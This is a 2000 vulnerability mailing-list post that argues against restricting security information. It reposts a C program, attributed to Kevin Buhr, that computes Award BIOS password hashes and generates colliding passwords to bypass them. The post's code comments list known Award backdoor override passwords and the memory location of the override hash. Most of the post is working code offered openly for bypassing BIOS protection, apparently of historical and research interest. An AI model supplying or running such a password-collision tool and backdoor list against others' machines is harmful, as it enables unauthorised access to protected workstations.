From: Robert A. Seace [ras@SLARTIBARTFAST.MAGRATHEA.COM] Sent: Thursday, April 06, 2000 2:36 PM To: VULN-DEV@SECURITYFOCUS.COM Subject: Award BIOS passwords (was Re: local security workaround through IE) In the profound words of Mr Jason C Hill: > > There is of course the backdoor passwords for the BIOS too. Older Award BIOS' > have two that i know of! > [snip...] > > Send me a personal mail if you'd like the Award BIOS backdoors - i'm only going > to mail them to worthy persons (dependant on your requirements and source email > address) to save people like me (College sys admins) the trouble caused by > kiddies messing up workstations. Well, thankfully not everyone else shares your strange view that information is somehow "dangerous", and should be restricted only to those deemed "worthy"... Trying to restrict information is merely another form of "security through obscurity"; and, hopefully everyone on this list has enough of a brain to realize that such an approach simply does NOT work... For the "unworthy" masses, below is an old program I picked up somewhere, but can't for the life of me remember WHERE now (or, I'd just provide an URL)... It's able to figure out Award BIOS passwords based on hashes... It also mentions a few of the common backdoor passwords found on many Award BIOSes... It ain't mine, so heap all praise/criticism on the author, not me, please... -- ||========================================================================|| || Robert A. Seace || URL || ras@magrathea.com || || AKA: Agrajag || http://www.magrathea.com/~ras/ || rob@wordstock.com || ||========================================================================|| "You just come along with me and have a good time. The Galaxy's a fun place. You'll need to have this fish in your ear." "I beg your pardon?" - THGTTG ************************************ Cut Here ******************************* #include #include #include /* * NAME * * awardpw -- Award BIOS Password generator and hash calculator * * SYNOPSIS * * awardpw * awardpw password1 [password2...] * awardpw {-r | -s} [-t target] [-l length] [-i randseed] * * DESCRIPTION * * Without arguments, awardpw prints a usage message. Given a list * of passwords, it calculates the Award BIOS hash for each * password. Given option -r, it generates random, alphanumeric * (digits and upper and lower case) passwords of the given length, * matching the target hash. Given option -s, it generates the * sequence of all printable passwords of given length and target * hash. * * The default target is 0x1eaa, a common hash for the Award * "override" password. The default length is 4. * * NOTES * * The "intended" override password for hash 0x1eaa was probably * "AWARD_SW", though "j262", "Syxz", and others have been * offered. Someone reported "aLLy" (hash 0x1ea9) working for * later versions of the Award BIOS, where the old passwords didn't * work. "AWARD_SV" has hash 0x1ea9, too. * * On my Award BIOS (f000:fff5 date "03/10/95"), the password * checking code uses the word at f000:ec60 for the override hash. * If you have an OEM version of Award that doesn't respond to the * "usual" overrides, you might want to check that word to see if * a different override hash is sitting there. * * Some combinations of arguments will generate plenty of * passwords, some will generate none. For example, there are no * 5-character plaintext passwords for the 0x1eaa hash, but * 4-character and 6-character passwords are plentiful. This is * just an artifact of the hashing algorithm used. * * AUTHOR * * Kevin Buhr */ /* * the hashing algorithm: accumulate characters in a 16-bit register * with a 2-bit left rotate before each add. */ int eval_pw(char *pw) { unsigned int accum = 0; while (*pw) { accum = (accum << 2) | (accum >> 14); accum += *pw++; accum &= 0xffff; } return accum & 0xffff; } void rand_pw(int n, char *pw) { int i,j; unsigned int r, r62; for (i=0; i<2; ++i) { r = rand(); for (j=0; j<4; ++j) { r62 = r % 62; *pw++ = r62 <= 10 ? r62 + '0' : r62 <= 10+26 ? r62 - 10 + 'A' : r62 - 10 - 26 + 'a'; if (--n <= 0) return; r /= 62; } } } int inc_pw(char *pw) { while (*pw == 126) { *pw++ = ' '; } if (*pw) ++*pw; return *pw; } char *argv0; void show_syntax() { fprintf(stderr, "awardpw -- calculate Award BIOS password hashes\n" " (by Kevin Buhr )\n"); fprintf(stderr, "syntax:\n" "\t%s password1 [password2...]\n" "\t%s {-r | -s} [-t target] [-l length] [-i randseed]\n", argv0, argv0); } void try_random(int n, unsigned int target) { char pw[9]; if (n==0 || n>8) n=8; pw[n] = 0; fprintf(stderr, "target = 0x%04x\n", target); while(1) { rand_pw(n,pw); if (eval_pw(pw) == target) { printf("%s\n",pw); } } } void try_sequence(int n, unsigned int target) { char pw[] = " "; if (n==0 || n>8) n=8; pw[n] = 0; fprintf(stderr, "target = 0x%04x\n", target); do { if (eval_pw(pw) == target) { printf("%s\n",pw); } } while (inc_pw(pw)); } int main(int argc, char** argv) { int opt; int length = 4, target = 0x1eaa, seed = 0; enum { NONE, RANDOM, SEQUENCE } mode = NONE; argv0 = (argv[0] ? argv[0] : "awardpw"); while((opt = getopt(argc, argv, "hrsl:t:i:")) != EOF) { switch (opt) { case 'h': show_syntax(); break; case 'l': length = atoi(optarg); break; case 't': target = strtol(optarg,NULL,0); break; case 'i': seed = atoi(optarg); break; case 'r': mode = RANDOM; break; case 's': mode = SEQUENCE; break; default: show_syntax(); exit(1); } } srand(seed); switch (mode) { case RANDOM: try_random(length, target); break; case SEQUENCE: try_sequence(length, target); break; default: if (!argv[optind]) { show_syntax(); } else { while(argv[optind]) { printf("%s => %04x\n", argv[optind], eval_pw(argv[optind])); ++optind; } } break; } return 0; }